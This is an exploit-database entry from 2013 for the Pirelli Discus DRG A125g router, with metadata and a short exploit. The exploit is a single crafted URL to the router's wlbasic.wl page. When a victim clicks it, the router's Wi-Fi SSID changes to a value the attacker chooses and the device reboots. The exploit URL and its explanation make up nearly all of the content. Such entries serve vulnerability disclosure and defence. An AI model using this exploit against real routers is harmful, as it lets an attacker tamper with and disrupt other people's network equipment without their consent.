Pirelli Discus DRG A125g - Remote Change SSID Value

Author: Sebastián Magof
type: webapps
platform: hardware
port: 
date_added: 2013-11-24  
date_updated: 2013-11-24  
verified: 0  
codes: OSVDB-100354  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29794.txt  
# Exploit Title: Pirelli Discus DRG A125g remote change SSID value
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) αlpha
#(")(")


#Exploit:

http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof

#info: where the parameter "wlSsid"  is where the attacker will enter the
new SSID. If the victim clicks on the url your modem / router will reboot
automatically with the new SSID provided by the attacker.